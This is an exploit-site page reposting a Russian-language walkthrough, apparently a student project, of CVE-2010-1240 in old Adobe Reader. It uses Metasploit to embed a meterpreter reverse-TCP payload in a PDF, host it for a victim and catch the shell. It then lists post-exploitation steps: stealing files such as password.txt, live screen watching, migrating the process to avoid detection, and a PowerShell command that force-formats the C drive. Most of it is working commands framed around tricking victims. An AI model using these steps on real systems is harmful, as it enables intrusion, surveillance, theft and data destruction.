Sploitus

Exploit for Embedded-Backdoor-Connection

kitploit · 2026-09-04

Exploit Code

MARKDOWN274 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-OMAROTHMANN-EMBEDDED-BACKDOOR-CONNECTION
# Встроенное бэкдор-соединение через PDF-файлы 😈

_**представлено вам**_ ![](https://shields.io/badge/Bawang-Ranger-green?style=for-the-badge&logo=CodeIgniter&logoColor=orange)

## Введение

Это демонстрационное видео показывает, как мы можем управлять устройством жертвы, отправив ей безобидный на вид PDF-файл, который на самом деле содержит встроенную полезную нагрузку. Эксплойт был обнародован как CVE-2010-1240.

Как только PDF открывается в Adobe Reader, пользователи, которых мы обманом заставляем согласиться на всплывающие окна безопасности, позволяют нам получить сеанс meterpreter, подключенный к их устройствам через обратное TCP-соединение. До этого момента все их данные и то, что они делают в данный момент, находятся под нашим наблюдением.

![Hehe~Boi](https://assets.kitploit.com/production/public/readmes/30221/a4108311330576b94ef4d59a48f9871857a2240f309895cd210b4bb311683848.gif)

## Список программ/инструментов

  * Metasploit
  * Adobe Reader <= 8.1.2



## Окружение

![Kali Linux](https://img.shields.io/badge/Kali%20Linux-%3E=%202021.1-005ab3?style=for-the-badge&logo=kali-linux&logoColor=white) ![Windows 7 or 10](https://img.shields.io/badge/Windows-7%20%7C%2010%20-0078D6?style=for-the-badge&logo=windows&logoColor=white) ![Adobe Reader](https://img.shields.io/badge/Adobe%20Reader-%3C=%208.1.2-red?style=for-the-badge&logo=adobe-acrobat-reader&logoColor=white)

  * **Машина атакующего** : Kali Linux версия 2021.1
  * **Целевая ОС** : Windows 10 (x86) или Windows 7 (x86)
  * **Целевое ПО** : Adobe Reader 8.1.2



## Подробные шаги

Сначала запускаем MSFconsole, который предоставляет интерфейс командной строки для доступа к фреймворку Metasploit.

root@kitploit:~
    
    
    msfconsole
    

Затем ищем эксплойт, соответствующий нашей целевой платформе Windows и Adobe PDF Reader, который выведет целый список эксплойтов, которые можно использовать для взлома Windows-машины жертвы и эксплуатации уязвимостей Adobe PDF Reader.

root@kitploit:~
    
    
    search type:exploit platform:windows adobe pdf
    

В этой эксплуатации мы выбираем и используем модуль "adobe_pdf_embedded_exe" с помощью команды ниже, чтобы добиться цели захвата контроля над жертвой.

root@kitploit:~
    
    
    use exploit/windows/fileformat/adobe_pdf_embedded_exe
    

Мы также можем проверить информацию об эксплойте, используя команду “info”, как показано ниже:

root@kitploit:~
    
    
    info
    

Затем устанавливаем полезную нагрузку для использования обратного TCP-соединения. Мы также используем Meterpreter, который предоставляет интерактивную оболочку, упрощая использование всевозможных функций для вставки и выполнения кода с целью исследования машины жертвы.

root@kitploit:~
    
    
    set payload windows/meterpreter/reverse_tcp
    

Затем настроим прослушивающий хост и порт. Для LHOST нужно указать IP-адрес машины атакующего, в данном случае это IP-адрес нашей Kali-машины (10.0.2.4)*.

  * **`*p.s.`**
    * _Вы должны использовать IP вашей собственной Kali-машины_
    * _Вы можете использовать другой номер порта_



root@kitploit:~
    
    
    # to check Kali machine’s IP address
    ifconfig
    
    set LHOST *10.0.2.4*
    set LPORT 5665
    

Затем установим входной файл для основы PDF с флагом INFILENAME*. Далее зададим имя файла, которое привлечет интерес жертвы к открытию вредоносного PDF-файла.

  * **`*p.s.`**
    * _Вы должны убедиться, что путь к вашему PDF-файлу указан верно_
    * _Вы можете использовать другое имя файла_



root@kitploit:~
    
    
    set INFILENAME '/home/kali/Documents/WIC3004Assignment.pdf'
    set FILENAME 'Bawang_Ranger_WIC3004Report.pdf'
    

Мы можем снова просмотреть наши параметры перед вводом команды “exploit” для генерации полезной нагрузки вместе с PDF.

root@kitploit:~
    
    
    # Then we can show the info or options by
    show info | show options
    
    exploit
    

После того как мы сгенерировали PDF-файл, переместим его в /var/www/html — каталог нашей Kali-машины для размещения веб-сервера приложений, чтобы жертва могла позже скачать PDF-файл.

  * **`Note:`**
    * _Если вы установили другое имя файла, убедитесь, что копируете правильный путь!_



root@kitploit:~
    
    
    sudo mv /home/kali/.msf4/local/Bawang_Ranger_WIC3004Report.pdf /var/www/html
    

Затем для настройки нашего слушателя воспользуемся "exploit/multi/handler". Снова установим полезную нагрузку, LHOST, LPORT в соответствии с тем, что мы определили при генерации вредоносного PDF-файла. Затем запустим полезную нагрузку.

  * **`Note:`**
    * _LHOST: Пожалуйста, укажите IP-адрес вашей собственной Kali-машины_
    * _LPORT: Если вы установили другой номер порта, убедитесь, что вводите его правильно_
    * `show info` or `show options` — необязательные команды. Они нужны только для проверки того, что вы только что установили.



root@kitploit:~
    
    
    use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp
    set LHOST 10.0.2.4
    set LPORT 5665
    [show info | show options]
    run
    

В другом терминале проверяем статус сервера Apache, чтобы убедиться, что он работает и размещает наш PDF-файл в /var/www/html для скачивания жертвой.

root@kitploit:~
    
    
    service apache2 status
    
    # If it is inactive, start the service
    service apache2 start
    

* * *

На Windows-машине откройте любой браузер, например Chrome, и введите IP нашей Kali (10.0.2.4)* для доступа к веб-серверу приложений Kali-машины.

**`*Примечание:`** _Пожалуйста, укажите IP-адрес вашей собственной Kali-машины_

Затем имитируйте сохранение целевого PDF-файла пользователем.

Как только жертва открывает файл в Adobe Reader 8.1.2 и принимает запросы безопасности, мы можем наблюдать на нашей Kali-машине новую сессию, подключенную через обратное TCP-соединение.

**В реальном сценарии** мы настроим веб-сайт с PDF-файлом, содержащим полезную нагрузку, чтобы жертва могла скачать файл или мы прикрепим его к письму.

* * *

## Результат эксплуатации

Затем мы можем удаленно получить доступ к машине жертвы и выполнять другие вредоносные действия по нашему желанию в сеансе meterpreter.

### Чтобы показать список действий, которые мы можем выполнять

root@kitploit:~
    
    
    help
    

### Вывести текущий каталог

root@kitploit:~
    
    
    pwd
    

### Вывести список файлов в этом каталоге

root@kitploit:~
    
    
    ls
    

### Скачать папку или файл с машины жертвы

Например, если есть файл с именем `password.txt`, мы можем выполнить команду `download password.txt`

root@kitploit:~
    
    
    download [folder name | filename with extension]
    

### Создать файл на машине жертвы

Конечно, мы можем написать вредоносный скрипт (внедрить бэкдор), чтобы сохранить подключение к Windows-машине, если мы действительно злые! 💀

root@kitploit:~
    
    
       # Boot command prompt at background
       execute -f cmd.exe -H -i
       
       # Create file on Windows
       echo "You have been hacked" > hack.txt    
    

### Взаимодействие с Windows

root@kitploit:~
    
    
       #open the txt file we have just created
       hack.txt
    
       # Take screenshot
       screenshot
       
       # Watch the remote user in real time
       screenshare
    

### Дополнительно

Однако атакующий может снизить подозрения, мигрировав процесс meterpreter в другой с помощью модуля migrate в сеансе meterpreter.

root@kitploit:~
    
    
    meterpreter> run post/windows/manage/migrate
    

Здесь он автоматически создаст новый процесс на машине жертвы, в который сможет мигрировать. Жертва сможет удалить зараженный PDF-файл, совершенно не подозревая, что процесс уже переместился в другое место.

Атакующий может также создать вредоносный скрипт на целевой машине с помощью командной строки (cmd) или PowerShell, который способен вывести из строя всю операционную систему.

root@kitploit:~
    
    
    meterpreter> shell 
    

root@kitploit:~
    
    
    # Start the Windows PowerShell
    powershell
    
    #Powershell command to forcefully format the C drive clean.
    New-Partition -DiskNumber 1 -UseMaximumSize -AssignDriveLetter C| Format-Volume -DriveLetter C -FileSystemLabel "New"-FileSystem NTFS -Full -Force -Confirm:$false
    

## Демонстрационное видео

![Demo](https://assets.kitploit.com/production/public/readmes/30221/e90d5483985591b07d5af7aaddda33eea631c2f3aca800d462775102aca02418.jpg)